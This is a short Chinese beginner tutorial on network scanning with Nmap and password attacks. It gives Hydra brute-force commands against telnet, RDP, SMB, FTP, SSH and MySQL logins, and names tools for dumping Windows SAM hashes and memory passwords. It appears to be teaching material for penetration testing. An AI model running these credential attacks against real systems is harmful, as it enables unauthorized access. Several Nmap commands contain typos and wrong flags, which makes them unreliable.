简单的扫描与爆破

扫描技术

一个一个ping ?
手工与工具相结合。
主机探测与端口扫描。
主机测探是指确定目标主机是否存活。
端口扫描就是寻找在线主机所开放的端口,并且在端口上所运行的服务。甚至可以进一-步确
定目标主机操作系统类型和更详细的信息。
基础知识
@常见端口号
简单的扫描与爆破_第1张图片
Nmap-扫描器之王.
重要常用参数

简单的扫描与爆破_第2张图片

Nmap    -sP   10.1.1.1/24       //扫描 10.1.1.0整个网段主机是否在线
Nmap  -P    21, 23-25, 3389 10.1.1.1 //扫描 10.1.1.1  21, 23-25, 3389端口是否开放
Nmap  -P     21,23 10.1.1.1 -sV    //扫描21,23的服务版本
Nmap  -A   10.1.1.1    //全面扫描
Nmap   -O  10.1.1.1   //扫描目标系统版本
Namp  -P   21, 23   10.1.1.1   -0N   e: \ result. txt //扫描 10.1.1.1  21, 23-25, 3389端口是否开放并保存到e: \ result. txt 下

爆破

注:字典很重要

软件:Hydra(九头蛇)

Hydra -l administrator -p 123 10.1.1.1 telnet     //爆破 具体账号密码测试
Hydra -l administrator -P e: \pass. txt   10.1.1.1 telnet //爆破目标telnet服务,端口23  密码字典e: \pass. txt 
Hydra -l administrator -P e: \pass. txt   10.1.1.1 rdp //爆破目标rdp服务,端口3389
Hydra -l administrator -P e:\pass.txt  10.1.1.1  smb  //爆破目标共享服务,端口445
Hydra -l administrator -P e:\pass.txt  10.1.1.1  ftp  //爆破目标ftp服务,端口21
Hydra -l administrator -P e:\pass.txt  10.1.1.1  ssh //爆破目标ssh服务,端口 22
Hydra -l administrator -P e:\pass.txt  10.1.1.1  mysql //爆破目标mysql服务,端口 3306

本地破解.
Getpass
从内存中提取密码

本地暴力破解:
Pwdump
提取sam中的HASH值

简单的扫描与爆破_第3张图片
手工将hash值存储到hash.txt中。

使用saminside软件进行hash暴力破解
简单的扫描与爆破_第4张图片
简单的扫描与爆破_第5张图片

你可能感兴趣的:(简单的扫描与爆破)